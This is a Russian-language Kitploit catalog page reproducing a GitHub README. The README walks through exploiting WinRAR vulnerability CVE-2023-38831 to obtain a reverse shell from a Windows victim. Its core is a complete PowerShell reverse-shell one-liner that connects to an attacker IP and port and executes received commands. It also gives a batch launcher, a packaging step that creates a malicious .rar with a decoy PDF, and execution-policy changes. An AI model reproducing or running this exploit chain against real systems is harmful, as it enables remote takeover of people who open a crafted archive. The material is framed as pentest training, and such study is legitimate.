Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-38831_ReverseShell_Winrar-RCE — Необходимые шаги для получения reverse shell при эксплуатации уязвимости WinRAR CVE-2023-38831 в версиях до 6.23. | Kitploit
Инструменты/GitHubGitHub/maalfer/cve-2023-38831_reverseshell_winrar-rce
ЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика
GitHubmaalfer/cve-2023-38831_reverseshell_winrar-rce

CVE-2023-38831_ReverseShell_Winrar-RCE

Необходимые шаги для получения reverse shell при эксплуатации уязвимости WinRAR CVE-2023-38831 в версиях до 6.23.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2282 лет назадПроверено Kitploit

ПОЛУЧЕНИЕ REVERSE SHELL ПУТЁМ ЭКСПЛУАТАЦИИ УЯЗВИМОСТИ CVE-2023-38831 В WINRAR

В этом репозитории мы будем эксплуатировать уязвимость CVE-2023-38831 в WinRAR, чтобы получить reverse shell с машины-жертвы Windows на атакующую машину Kali Linux.

ПРЕДВАРИТЕЛЬНЫЕ ШАГИ

Скачиваем содержимое этого репозитория:

изображение

Далее необходимо установить зависимости Python, необходимые для эксплуатации этой уязвимости, с помощью следующих команд:

root@kitploit:~
pip install rarce

изображение

ПОДГОТОВКА

Мы запустим вредоносный код, который предоставит нам reverse shell, взятый с сайта revshells.com (указав IP-адрес и порт атакующего):

https://www.revshells.com/

изображение

root@kitploit:~
$LHOST = "192.168.0.36"; $LPORT = 443; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

Этот код PowerShell сохраняем в файл .ps1 (он будет выполнен позже):

изображение

После того как мы получили код в ps1 для получения reverse shell, создаём Python-файл, который с помощью библиотеки os будет выполнять файл .ps1:

изображение

Затем создаём .bat-файл со следующим кодом:

изображение

root@kitploit:~

rem Ruta al ejecutable de Python
set PYTHON_EXECUTABLE=python.exe

rem Ruta al script de Python que deseas ejecutar
set PYTHON_SCRIPT=pwned.py

rem Ejecutar el script de Python
%PYTHON_EXECUTABLE% %PYTHON_SCRIPT%

rem Pausa para que puedas ver la salida antes de que se cierre la ventana
pause

ЭКСПЛУАТАЦИЯ

На этом этапе мы должны создать вредоносный WinRAR:

изображение

Запускаем файл documento.pdf внутри .rar:

изображение

изображение

Наконец, если мы останемся в режиме прослушивания с помощью netcat на атакующей машине, мы получим reverse shell:

изображение

РЕШЕНИЕ ВОЗМОЖНЫХ ОШИБОК:

Если не удаётся выполнять команды PowerShell, необходимо включить выполнение сценариев в вашей системе:

изображение

изображение

Включаем его:

изображение

И выполняем следующую команду:

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

Скачать инструмент